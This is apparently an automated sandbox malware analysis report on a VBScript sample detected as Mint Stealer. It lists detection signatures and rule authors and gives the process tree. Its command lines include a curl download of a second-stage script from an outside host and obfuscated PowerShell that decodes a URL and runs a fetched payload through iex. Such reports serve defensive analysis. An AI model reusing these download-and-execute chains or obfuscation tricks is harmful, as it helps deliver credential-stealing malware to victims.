Windows Analysis Report: 676556be12ac3.vbs
Overview
General Information
Detection
Mint Stealer
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 7464 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\676556be12ac3.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676556be12aca.vbs https://file-download.bytez.cloud/676556be12355/676556be12aca.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7564 cmdline: curl -k -o C:\Users\Public\676556be12aca.vbs https://file-download.bytez.cloud/676556be12355/676556be12aca.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cmd.exe (PID: 7636 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676556be12aca.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7704 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676556be12aca.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 7900 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\ykgnts.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7732 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676556be12aca.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7828 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676556be12aca.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 7932 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\jfwdec.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
- conhost.exe (PID: 8012 cmdline: conhost --headless powershell $vgefcqxzrt='ur' ;new-alias printout c$($vgefcqxzrt)l;$hfcvpezag=(1834,1845,1853,1837,1839,1834,1854,1853,1858,1791,1853,1787,1834,1782,1852,1847,1848,1783,1785,1782,1848,1840,1848,1799,1851,1797,1845,1841,1846,1852,1851,1786,1785);$tojrkpgbsvmcq=('bronx','get-cmdlet');$lspvtzafdqnegy=$hfcvpezag;foreach($bzgumhk in $lspvtzafdqnegy){$ontzid=$bzgumhk;$wzyatgcpjiv=$wzyatgcpjiv+[char]($ontzid-1736);$hmgrcuitvfb=$wzyatgcpjiv; $quvrzaxtinbgm=$hmgrcuitvfb};$mzxndfjebgh[2]=$quvrzaxtinbgm;$edsogfiw='rl';$hqukojaxyi=1;.$([char](9992-9887)+'e'+'x')(printout -useb $quvrzaxtinbgm) MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8032 cmdline: powershell $vgefcqxzrt='ur' ;new-alias printout c$($vgefcqxzrt)l;$hfcvpezag=(1834,1845,1853,1837,1839,1834,1854,1853,1858,1791,1853,1787,1834,1782,1852,1847,1848,1783,1785,1782,1848,1840,1848,1799,1851,1797,1845,1841,1846,1852,1851,1786,1785);$tojrkpgbsvmcq=('bronx','get-cmdlet');$lspvtzafdqnegy=$hfcvpezag;foreach($bzgumhk in $lspvtzafdqnegy){$ontzid=$bzgumhk;$wzyatgcpjiv=$wzyatgcpjiv+[char]($ontzid-1736);$hmgrcuitvfb=$wzyatgcpjiv; $quvrzaxtinbgm=$hmgrcuitvfb};$mzxndfjebgh[2]=$quvrzaxtinbgm;$edsogfiw='rl';$hqukojaxyi=1;.$([char](9992-9887)+'e'+'x')(printout -useb $quvrzaxtinbgm) MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 8080 cmdline: conhost --headless powershell $bajznwdxfqyht='ur' ;new-alias printout c$($bajznwdxfqyht)l;$gqcbnpkvtwdlr=(5904,5915,5923,5907,5909,5904,5924,5923,5928,5861,5923,5857,5904,5852,5922,5917,5918,5853,5855,5852,5918,5910,5918,5869,5921,5867,5915,5911,5916,5922,5921,5856,5855);$otrdenu=('bronx','get-cmdlet');$ykcsfp=$gqcbnpkvtwdlr;foreach($qmotvzbud in $ykcsfp){$gbmykl=$qmotvzbud;$clsnkw=$clsnkw+[char]($gbmykl-5806);$gsqzfklidcjt=$clsnkw; $xedctq=$gsqzfklidcjt};$ifebnlk[2]=$xedctq;$hnafgyt='rl';$jrmstyaoedk=1;.$([char](9992-9887)+'e'+'x')(printout -useb $xedctq) MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 8100 cmdline: powershell $bajznwdxfqyht='ur' ;new-alias printout c$($bajznwdxfqyht)l;$gqcbnpkvtwdlr=(5904,5915,5923,5907,5909,5904,5924,5923,5928,5861,5923,5857,5904,5852,5922,5917,5918,5853,5855,5852,5918,5910,5918,5869,5921,5867,5915,5911,5916,5922,5921,5856,5855);$otrdenu=('bronx','get-cmdlet');$ykcsfp=$gqcbnpkvtwdlr;foreach($qmotvzbud in $ykcsfp){$gbmykl=$qmotvzbud;$clsnkw=$clsnkw+[char]($gbmykl-5806);$gsqzfklidcjt=$clsnkw; $xedctq=$gsqzfklidcjt};$ifebnlk[2]=$xedctq;$hnafgyt='rl';$jrmstyaoedk=1;.$([char](9992-9887)+'e'+'x')(printout -useb $xedctq) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
| JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
System Summary

Source | Author
---|---
| frack113, Florian Roth
| Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
| Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
| Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
| Tim Shelton
| frack113
| James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
| Michael Haag
| Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)